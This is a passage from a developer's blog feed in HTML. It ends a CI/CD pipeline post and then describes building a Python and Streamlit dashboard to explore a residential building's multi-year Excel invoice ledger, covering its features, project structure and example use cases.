&lt;td&gt;&lt;strong&gt;Live Site&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Open Source Repo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev" rel="noopener noreferrer"&gt;https://github.com/lfariabr/luisfaria.dev&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI Workflow&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/.github/workflows/ci.yml" rel="noopener noreferrer"&gt;.github/workflows/ci.yml&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Docker Compose&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/docker-compose.yml" rel="noopener noreferrer"&gt;docker-compose.yml&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Epic Tracker&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/107" rel="noopener noreferrer"&gt;Issue #107 — CI/CD Epic&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;All 20+ CI Commits&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/search?q=repo%3Alfariabr%2Fluisfaria.dev+%28ci%29&amp;amp;type=commits&amp;amp;s=committer-date&amp;amp;o=desc" rel="noopener noreferrer"&gt;Commit history&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Let's Connect!
&lt;/h2&gt;

&lt;p&gt;Building this CI/CD pipeline was one of the most rewarding engineering challenges on my portfolio — 20+ iterations of debugging SSH keys, Docker DNS, NGINX caching, and package breaking changes. Every failure taught me something production engineers deal with daily.&lt;/p&gt;

&lt;p&gt;If you're working with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;GitHub Actions and Docker-based deployments&lt;/li&gt;
&lt;li&gt;DigitalOcean or similar VPS infrastructure&lt;/li&gt;
&lt;li&gt;MERN/Next.js applications in production&lt;/li&gt;
&lt;li&gt;CI/CD pipelines on a budget&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd love to connect and trade war stories:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Tech Stack Summary:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Current Implementation&lt;/th&gt;
&lt;th&gt;Future Extensions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;GitHub Actions, GHCR, Docker Compose, NGINX, Next.js, Node.js, MongoDB, Redis, Jest, Discord Webhooks&lt;/td&gt;
&lt;td&gt;Staging environment, Sentry, zero-downtime rolling updates, Kubernetes migration&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;em&gt;Built with ☕ and a couple of failed deploys by &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;Luis Faria&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Whether it's concrete or code, structure is everything.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>githubactions</category>
      <category>cicd</category>
      <category>devops</category>
      <category>docker</category>
    </item>
    <item>
      <title>From Excel to Interactive Business Insights with Python &amp; Streamlit</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Mon, 02 Feb 2026 02:49:30 +0000</pubDate>
      <link>https://forem.com/lfariaus/from-excel-to-interactive-business-insights-with-python-streamlit-2mnd</link>
      <guid>https://forem.com/lfariaus/from-excel-to-interactive-business-insights-with-python-streamlit-2mnd</guid>
      <description>&lt;p&gt;&lt;strong&gt;How I turned a multi-year building invoice ledger into an interactive analytics dashboard — and why it changed how I think about operations, data, and engineering.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"The best code is the code that quietly removes friction from people's work."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🏢 Context: Assistant Building Manager, Real Data, Real Stakes
&lt;/h2&gt;

&lt;p&gt;Over a six-week stretch, I was working as an &lt;strong&gt;Assistant Building Manager&lt;/strong&gt; at a large residential building in the south of Sydney, closely shadowing an experienced Building Manager with 25+ years across construction, water systems, and large-scale facilities operations.&lt;/p&gt;

&lt;p&gt;Alongside day-to-day operations, I also built small internal tools — like a &lt;a href="https://dev.to/lfariaus/engineering-principles-applied-to-daily-life-concierge-edition-1cjh"&gt;Lift Finder&lt;/a&gt; utility and &lt;a href="https://dev.to/lfariaus/myroster-from-copypaste-to-2-minute-submissions-dao"&gt;myRoster&lt;/a&gt; (a shift automation app) — whenever I noticed repetitive friction in the workflow.&lt;/p&gt;

&lt;p&gt;This role exposed me to the &lt;strong&gt;full operational lifecycle&lt;/strong&gt; of a high-rise building:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Stakeholder management&lt;/strong&gt;: Owners Corporation, committee members, residents, strata, contractors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Maintenance workflows&lt;/strong&gt;: diagnosis → contractor selection → approval → execution → validation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance &amp;amp; regulation&lt;/strong&gt;: AFSS, fire services, inspections, reporting&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Financial reality&lt;/strong&gt;: invoices, budgets, approvals, recurring vs reactive spend&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And obviously — massive amounts of &lt;strong&gt;data&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Around the same time, I accepted a &lt;strong&gt;Data Analyst&lt;/strong&gt; role at &lt;strong&gt;St Catherine’s School&lt;/strong&gt; (&lt;a href="https://dev.to/lfariaus/learning-sql-server-the-hard-way-16-days-of-real-world-database-work-5hla"&gt;Read more&lt;/a&gt;), which reinforced the same mindset: treat operational noise as structured data waiting to be explored.&lt;/p&gt;

&lt;p&gt;Every single decision eventually traced back to one place.&lt;/p&gt;




&lt;h2&gt;
  
  
  📁 The Starting Point: An Excel Invoice Ledger
&lt;/h2&gt;

&lt;p&gt;Inside the building's shared drive (&lt;em&gt;S://BuildingName/Finances/Invoices&lt;/em&gt;) lived an unassuming file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A multi-sheet &lt;strong&gt;invoice ledger&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Spanning &lt;strong&gt;4+ years&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Thousands of rows&lt;/li&gt;
&lt;li&gt;Dozens of contractors&lt;/li&gt;
&lt;li&gt;Hundreds of services&lt;/li&gt;
&lt;li&gt;GST, dates, approvals, variations, reworks&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Firb0oqb8zf3qm2nfo4yr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Firb0oqb8zf3qm2nfo4yr.png" alt="Microsoft Excel File" width="800" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;On paper, it was "just Excel."&lt;/p&gt;

&lt;p&gt;In reality, it was:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The financial memory of the building.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Every question led back to it:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;How much are we spending on fire services?&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Is this contractor consistently expensive or just a one-off?&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Why did costs spike mid-2023?&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Are we reacting to problems or investing preventatively?&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  ⚠️ The Problem: Excel Doesn't Scale with Questions
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Why Excel Became the Bottleneck
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Excel Reality&lt;/th&gt;
&lt;th&gt;Building Management Reality&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Manual filters&lt;/td&gt;
&lt;td&gt;Questions come fast&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pivot tables break&lt;/td&gt;
&lt;td&gt;Context changes constantly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;One question at a time&lt;/td&gt;
&lt;td&gt;Multiple stakeholders need answers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10-minute turnaround&lt;/td&gt;
&lt;td&gt;Decisions need justification &lt;em&gt;now&lt;/em&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version control chaos&lt;/td&gt;
&lt;td&gt;Audit trail required&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;The typical workflow:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Open Excel (wait for thousands of rows to load...)&lt;/li&gt;
&lt;li&gt;Navigate to the right sheet (Building A? B? C?)&lt;/li&gt;
&lt;li&gt;Apply filters (Year... Contractor... Service...)&lt;/li&gt;
&lt;li&gt;Create pivot table (if you remember how)&lt;/li&gt;
&lt;li&gt;Screenshot or copy-paste results&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Repeat&lt;/strong&gt; for the next question 5 minutes later&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This wasn't analysis.&lt;br&gt;&lt;br&gt;
It was &lt;strong&gt;manual overhead&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;And in building management, manual overhead means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Slower contractor evaluations&lt;/li&gt;
&lt;li&gt;Delayed budget approvals&lt;/li&gt;
&lt;li&gt;Missed spending patterns&lt;/li&gt;
&lt;li&gt;Reactive instead of preventative decisions&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🎓 The Engineering Lens: Treating Excel as a Dataset
&lt;/h2&gt;

&lt;p&gt;At the same time, I'm pursuing a &lt;strong&gt;Master's in Software Engineering &amp;amp; Artificial Intelligence&lt;/strong&gt; (&lt;em&gt;see my &lt;a href="https://github.com/lfariabr/masters-swe-ai" rel="noopener noreferrer"&gt;open-source repo&lt;/a&gt;&lt;/em&gt;) — so my instinct kicked in:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;This isn't an Excel problem.&lt;br&gt;&lt;br&gt;
This is a &lt;strong&gt;data exploration problem&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;✅ The ledger already had:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Time-series data&lt;/strong&gt; (4+ years of invoices)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Categorical dimensions&lt;/strong&gt; (building, contractor, service)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Natural aggregations&lt;/strong&gt; (monthly spend, contractor totals)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Long-term trends&lt;/strong&gt; (seasonal patterns, cost escalation)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Outliers that matter financially&lt;/strong&gt; (unexpected spikes, recurring issues)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The data was &lt;strong&gt;already structured&lt;/strong&gt;.&lt;br&gt;&lt;br&gt;
Microsoft Excel was just the &lt;strong&gt;wrong interface&lt;/strong&gt; for exploration.&lt;/p&gt;

&lt;p&gt;So I built a tool in Python that lets &lt;strong&gt;non-technical users explore it safely&lt;/strong&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  🛠️ The Solution
&lt;/h2&gt;

&lt;p&gt;The goal was simple: turn a static spreadsheet into a safe, visual, self-service analytics tool for non-technical users.&lt;/p&gt;

&lt;p&gt;I built an &lt;strong&gt;interactive analytics dashboard&lt;/strong&gt; using &lt;strong&gt;Python + Pandas + Streamlit&lt;/strong&gt; to read from the &lt;code&gt;ledger.xlsx&lt;/code&gt; file.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsg3gnzjy1nv8oca6tiqr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsg3gnzjy1nv8oca6tiqr.png" alt="Streamlit User Interface with loaded data" width="800" height="372"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In minutes, I could answer questions that used to take 10–15 minutes of Excel wrestling — and export the evidence for emails, audits, or committee meetings.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;What It Does&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Upload&lt;/strong&gt; a raw &lt;code&gt;.xlsx&lt;/code&gt; invoice ledger → Instantly:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;🏢 &lt;strong&gt;Filter by building&lt;/strong&gt; (or view "All" for consolidated insights)&lt;/li&gt;
&lt;li&gt;📅 &lt;strong&gt;Filter by year(s)&lt;/strong&gt; (multi-select: 2023 + 2024)&lt;/li&gt;
&lt;li&gt;👷 &lt;strong&gt;Filter by contractor&lt;/strong&gt; (compare spending across vendors)&lt;/li&gt;
&lt;li&gt;🔧 &lt;strong&gt;Filter by service&lt;/strong&gt; (HVAC vs. Plumbing vs. Fire Services)&lt;/li&gt;
&lt;li&gt;🔍 &lt;strong&gt;Search by invoice number&lt;/strong&gt; (quick lookups)&lt;/li&gt;
&lt;li&gt;📆 &lt;strong&gt;Date range picker&lt;/strong&gt; (Q3 analysis, seasonal trends)&lt;/li&gt;
&lt;li&gt;💰 &lt;strong&gt;Amount range slider&lt;/strong&gt; (focus on high-value invoices)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Auto-compute:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Total spend (GST inc.)&lt;/li&gt;
&lt;li&gt;Invoice count&lt;/li&gt;
&lt;li&gt;Unique contractors&lt;/li&gt;
&lt;li&gt;Service diversity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Visualize:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;📊 &lt;strong&gt;Contractor spend breakdown&lt;/strong&gt; (bar chart + color-coded heatmap)&lt;/li&gt;
&lt;li&gt;📈 &lt;strong&gt;Monthly expense timeline&lt;/strong&gt; (spot trends, anomalies)&lt;/li&gt;
&lt;li&gt;🎨 &lt;strong&gt;Cost concentration&lt;/strong&gt; (which contractors dominate spend?)&lt;/li&gt;
&lt;li&gt;🔄 &lt;strong&gt;Multi-year comparisons&lt;/strong&gt; (year-over-year changes)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Export:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;📥 &lt;strong&gt;Download filtered results as CSV&lt;/strong&gt; (for reports, audits, approvals)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;No pivot tables.&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;strong&gt;No broken formulas.&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;strong&gt;No "give me 10 minutes to check."&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  🏗️ Tech Stack &amp;amp; Architecture
&lt;/h2&gt;

&lt;p&gt;The app follows &lt;strong&gt;clean software engineering principles&lt;/strong&gt; — modular, maintainable, production-ready.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Technology Choices&lt;/strong&gt;
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Language&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Python 3.10+&lt;/td&gt;
&lt;td&gt;Standard for data + automation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Web Framework&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://streamlit.io" rel="noopener noreferrer"&gt;Streamlit&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Rapid UI development, zero JavaScript&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Data Processing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://pandas.pydata.org/" rel="noopener noreferrer"&gt;Pandas&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Industry-standard DataFrames&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Excel Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://openpyxl.readthedocs.io/" rel="noopener noreferrer"&gt;openpyxl&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Multi-sheet Excel parsing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Visualization&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Streamlit charts + Pandas styling&lt;/td&gt;
&lt;td&gt;Built-in, no external dependencies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Streamlit Cloud&lt;/td&gt;
&lt;td&gt;Free hosting, GitHub integration&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Project Structure&lt;/strong&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;invoice-ledger/
├── app.py              # Main UI orchestration
├── data_loader.py      # Excel parsing &amp;amp; data cleaning
├── filters.py          # Interactive filter components
├── analytics.py        # Metrics, charts, visualizations
└── requirements.txt    # Dependencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why modular?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ &lt;strong&gt;Single Responsibility&lt;/strong&gt; — Each file does one thing well&lt;/li&gt;
&lt;li&gt;✅ &lt;strong&gt;Testable&lt;/strong&gt; — Unit test each component independently&lt;/li&gt;
&lt;li&gt;✅ &lt;strong&gt;Maintainable&lt;/strong&gt; — Know exactly where to make changes&lt;/li&gt;
&lt;li&gt;✅ &lt;strong&gt;Reusable&lt;/strong&gt; — Port components to other PropTech projects&lt;/li&gt;
&lt;li&gt;✅ &lt;strong&gt;Readable&lt;/strong&gt; — Onboard new devs in minutes, not hours&lt;/li&gt;
&lt;/ul&gt;




&lt;blockquote&gt;
&lt;p&gt;🔍 Full module-by-module breakdown available here → &lt;a href="https://github.com/lfariabr/invoice-ledger/tree/main/docs/ARCHITECTURE.md" rel="noopener noreferrer"&gt;docs/ARCHITECTURE.md&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  📊 The Impact: Before vs. After
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Before (Excel)&lt;/th&gt;
&lt;th&gt;After (Dashboard)&lt;/th&gt;
&lt;th&gt;Improvement&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Query Time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;10-15 minutes&lt;/td&gt;
&lt;td&gt;~2 minutes&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;80% faster&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Multi-building Analysis&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Open 3 files manually&lt;/td&gt;
&lt;td&gt;Single "All" view&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;3x faster&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Visualizations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Manual pivot tables&lt;/td&gt;
&lt;td&gt;Auto-generated charts&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100% automated&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Reproducibility&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;"How did I filter this again?"&lt;/td&gt;
&lt;td&gt;Click filters → Export CSV&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100% consistent&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Contractor Comparison&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Side-by-side spreadsheets&lt;/td&gt;
&lt;td&gt;Color-coded heatmap&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Instant insights&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Trend Analysis&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Copy-paste into separate tool&lt;/td&gt;
&lt;td&gt;Built-in timeline chart&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Native support&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;User Training&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;"Here's how Excel works..."&lt;/td&gt;
&lt;td&gt;"Upload and click"&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Zero onboarding&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  🎯 Real-World Use Cases
&lt;/h2&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;1. Contractor Performance Review&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;em&gt;"How much did we spend with ABC Plumbing across all buildings in 2024?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Old way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Open 3 Excel files (Building A, B, C)&lt;/li&gt;
&lt;li&gt;Filter each by contractor&lt;/li&gt;
&lt;li&gt;Sum manually&lt;/li&gt;
&lt;li&gt;5 minutes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;New way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Select "All buildings"&lt;/li&gt;
&lt;li&gt;Filter contractor: "ABC Plumbing"&lt;/li&gt;
&lt;li&gt;Filter year: "2024"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Answer in 30 seconds&lt;/strong&gt; &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The result isn’t just faster — it’s &lt;strong&gt;far more presentable&lt;/strong&gt;, making it suitable for committee meetings, audits, and stakeholder discussions.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;2. Budget Planning&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;em&gt;"What's our average monthly HVAC spending?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Old way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filter by service&lt;/li&gt;
&lt;li&gt;Create pivot table by month&lt;/li&gt;
&lt;li&gt;Calculate average&lt;/li&gt;
&lt;li&gt;Hope you didn't break formulas&lt;/li&gt;
&lt;li&gt;10 minutes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;New way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filter service: "HVAC"&lt;/li&gt;
&lt;li&gt;View monthly timeline chart&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Answer visible immediately&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;3. Audit Trail for Committee&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;em&gt;"Show me all fire services invoices over $5,000 from Q4 2024"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Old way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filter by service&lt;/li&gt;
&lt;li&gt;Filter by date range&lt;/li&gt;
&lt;li&gt;Filter by amount&lt;/li&gt;
&lt;li&gt;Screenshot or print&lt;/li&gt;
&lt;li&gt;12 minutes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;New way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Apply 3 filters&lt;/li&gt;
&lt;li&gt;Click "Download CSV"&lt;/li&gt;
&lt;li&gt;Attach to email&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Answer + deliverable in 2 minutes&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;4. Anomaly Detection&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;em&gt;"Why was November 2023 spending so high?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Old way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Create pivot table by month&lt;/li&gt;
&lt;li&gt;Spot the spike&lt;/li&gt;
&lt;li&gt;Filter November 2023&lt;/li&gt;
&lt;li&gt;Manually inspect rows&lt;/li&gt;
&lt;li&gt;15 minutes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;New way:&lt;/strong&gt;  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;View monthly timeline chart (spike visible instantly)&lt;/li&gt;
&lt;li&gt;Filter date range: November 2023&lt;/li&gt;
&lt;li&gt;Heatmap shows which contractor(s) caused it&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Root cause in 3 minutes&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Fun Fact
&lt;/h2&gt;

